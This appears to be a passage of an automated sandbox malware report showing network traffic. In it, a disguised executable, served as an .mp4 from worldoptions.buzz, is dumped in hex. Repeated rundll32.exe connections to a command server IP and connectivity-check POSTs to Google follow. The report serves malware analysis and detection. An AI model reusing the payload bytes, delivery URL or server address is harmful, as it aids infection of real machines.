              Data Ascii: P&1Z4TYr&&,>vWrrr?2j?b?vV;5|N@z?r?K;Brrr# !'$%::$Nlrrr:s$R:s:C:r:s$:C}bJxus:Kr,(:(V:s~9(n:sv:s:7r,:zrr-,/)(+:2"!# :,z:$b:nrrrqvx::Irvxr:4b:R:rrr:R:<jvstsrrrr(+)*:jrrr:u}:R:rrrr:rr"r;rBrr;2rrre:R:b:5zs5bN5:EK52L |5"M/l5BgD5j2;\5RPK5Ze?5J75*}5H5.@5:5T-5LxrrrArrrzrrrbrrr5urrrrrr4rrr9Prrr=zrrr$mpsrrrrrrSr:R:rrrr:rrsr;rbrr;vrrre:R:wrrr:Bsrr:e`rr:6srr:bc::Jrr:vV:R:rrr:R:z:2:.Vb:R:rrr:RqJsrrp1tNsrr:2JsrrbNsrr2srr2srruxu}(|rr:F`rr:6srr:wrr"!#:wrrrV2srrsxu~wrrpsrrwrrssrr:L`rr:6srr:wrr"!#?:wrrrV2srrtxu~wrrp^srrwrrsRsrr:#`rr:6srr:wrr"!#p:wrrrV2srrn{u~wrrprrrwrrsrrr:5`rr:6srr:wrr"!#
              Aug 14, 2022 08:39:19.303687096 CEST6OUTGET /agE7nqQLgssuVeUY/OGHAYZZFhfCtspqorBFNYMrxHN7TXIlz8vjv1TPmuyrc2yIu.mp4 HTTP/1.1
              Accept: */*
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: worldoptions.buzz
              Connection: Keep-Alive
              Aug 14, 2022 08:39:19.462470055 CEST8INHTTP/1.1 200 OK
              Date: Sun, 14 Aug 2022 06:39:19 GMT
              Server: Apache/2.4.41 (Ubuntu)
              Last-Modified: Tue, 09 Aug 2022 20:42:33 GMT
              ETag: "5c800-5e5d4f8c46040"
              Accept-Ranges: bytes
              Content-Length: 378880
              Keep-Alive: timeout=5, max=99
              Connection: Keep-Alive
              Content-Type: video/mp4
              Data Raw: 61 73 64 66 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 25 ef 75 51 61 8e 1b 02 61 8e 1b 02 61 8e 1b 02 bc 71 cb 02 60 8e 1b 02 27 df fa 02 2a 8e 1b 02 27 df fb 02 b4 8e 1b 02 27 df c4 02 6d 8e 1b 02 bc 71 d0 02 6c 8e 1b 02 61 8e 1a 02 1a 8e 1b 02 6c dc fe 02 68 8e 1b 02 6c dc c7 02 60 8e 1b 02 6c dc c0 02 60 8e 1b 02 6c dc c5 02 60 8e 1b 02 52 69 63 68 61 8e 1b 02 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 93 5b f2 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0c 00 00 fa 03 00 00 f6 01 00 00 00 00 00 40 3f 02 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 06 00 00 04 00 00 00 00 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 e0 60 05 00 63 00 00 00 44 61 05 00 8c 00 00 00 00 10 06 00 e0 01 00 00 00 d0 05 00 78 33 00 00 00 00 00 00 00 00 00 00 00 20 06 00 30 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 d0 04 00 70 00 00 00 00 00 00 00 00 00 00 00 00 10 04 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8e f8 03 00 00 10 00 00 00 fa 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 5d 01 00 00 10 04 00 00 5e 01 00 00 fe 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 54 00 00 00 70 05 00 00 2a 00 00 00 5c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 78 33 00 00 00 d0 05 00 00 34 00 00 00 86 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 e0 01 00 00 00 10 06 00 00 02 00 00 00 ba 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 30 0b 00 00 00 20 06 00 00 0c 00 00 00 bc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 83 ec 28 48 8d 15 d5 96 04 00 48 8d 0d fe 7b 05 00 41 b8 40 00 00 00 e8
              Data Ascii: asdf@!L!This program cannot be run in DOS mode.$%uQaaaq`'*''mqlalhl`l`l`RichaPEd[b" @?0``cDax3 0p.text `.rdata]^@@.data`Tp*\@.pdatax34@@.rsrc@@.reloc0 @BH(HH{A@


              Session IDSource IPSource PortDestination IPDestination PortProcess
              11192.168.2.224918364.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              12192.168.2.224918464.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              13192.168.2.224918564.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              14192.168.2.224918664.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              15192.168.2.224918764.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              16192.168.2.224918864.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              17192.168.2.224918964.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              18192.168.2.224919064.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              19192.168.2.224919164.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              2192.168.2.2249174142.250.185.228443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              20192.168.2.224919264.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              21192.168.2.224919364.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              22192.168.2.224919464.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              23192.168.2.224919564.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              24192.168.2.224919664.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              25192.168.2.224919764.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              26192.168.2.224919864.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              27192.168.2.224919964.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              28192.168.2.224920064.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              29192.168.2.224920164.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              3192.168.2.224917564.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              30192.168.2.224920264.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              31192.168.2.224920364.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              32192.168.2.224920464.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              33192.168.2.224920564.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              34192.168.2.224920664.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              35192.168.2.224920764.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              36192.168.2.224920864.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              37192.168.2.224920964.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              38192.168.2.224921064.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              39192.168.2.224921164.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              4192.168.2.224917664.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              40192.168.2.224921264.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              41192.168.2.224921364.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              42192.168.2.224921464.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              43192.168.2.224921564.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              44192.168.2.224921664.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              45192.168.2.224921764.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              46192.168.2.224921864.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              47192.168.2.224921964.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              48192.168.2.224922064.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              49192.168.2.224922164.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              5192.168.2.224917764.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              50192.168.2.224922264.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              51192.168.2.224922364.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              52192.168.2.224922464.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              53192.168.2.224922564.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              54192.168.2.224922664.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              55192.168.2.224922764.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              56192.168.2.224922864.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              57192.168.2.224922964.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              58192.168.2.224923064.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              59192.168.2.224923164.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              6192.168.2.224917864.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              60192.168.2.224923264.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              61192.168.2.224923364.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              62192.168.2.224923464.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              63192.168.2.224923564.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              64192.168.2.224923664.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              65192.168.2.224923764.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              66192.168.2.224923864.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              67192.168.2.224923964.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              68192.168.2.224924064.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              69192.168.2.224924164.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              7192.168.2.224917964.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              70192.168.2.224924264.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              71192.168.2.224924364.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              72192.168.2.224924464.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              73192.168.2.224924564.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              74192.168.2.224924664.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              75192.168.2.224924764.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              76192.168.2.224924864.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              77192.168.2.224924964.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              78192.168.2.224925064.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              79192.168.2.224925164.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              8192.168.2.224918064.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              80192.168.2.224925264.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              81192.168.2.224925364.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              82192.168.2.224925464.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              83192.168.2.224925564.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              84192.168.2.224925664.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              85192.168.2.224925764.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              86192.168.2.224925864.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              87192.168.2.224925964.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              88192.168.2.224926064.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              89192.168.2.224926164.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              9192.168.2.224918164.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              90192.168.2.224926264.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              91192.168.2.224926364.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              92192.168.2.224926464.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              93192.168.2.224926564.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              94192.168.2.224926664.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              95192.168.2.224926764.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              96192.168.2.224926864.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              97192.168.2.224926964.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              98192.168.2.224927064.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              99192.168.2.224927164.52.80.180443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData


              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.2249172142.250.185.228443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:27 UTC0OUTPOST / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: www.Google.com
              Content-Length: 0
              Cache-Control: no-cache
              2022-08-14 06:39:27 UTC0INHTTP/1.1 405 Method Not Allowed
              Allow: GET, HEAD
              Date: Sun, 14 Aug 2022 06:39:27 GMT
              Content-Type: text/html; charset=UTF-8
              Server: gws
              Content-Length: 1589
              X-XSS-Protection: 0
              X-Frame-Options: SAMEORIGIN
              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
              Connection: close
              2022-08-14 06:39:27 UTC0INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 28 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61
              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 405 (Method Not Allowed)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px aria
              2022-08-14 06:39:27 UTC1INData Raw: 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b
              Data Ascii: ges/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{back


              Session IDSource IPSource PortDestination IPDestination PortProcess
              1192.168.2.2249173142.250.185.228443C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              2022-08-14 06:39:27 UTC2OUTPOST / HTTP/1.1
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: www.Google.com
              Content-Length: 0
              Cache-Control: no-cache
              2022-08-14 06:39:27 UTC2INHTTP/1.1 405 Method Not Allowed
              Allow: GET, HEAD
              Date: Sun, 14 Aug 2022 06:39:27 GMT
              Content-Type: text/html; charset=UTF-8
              Server: gws
              Content-Length: 1589
              X-XSS-Protection: 0
              X-Frame-Options: SAMEORIGIN
              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
              Connection: close
              2022-08-14 06:39:27 UTC2INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 28 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61
              Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 405 (Method Not Allowed)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px aria
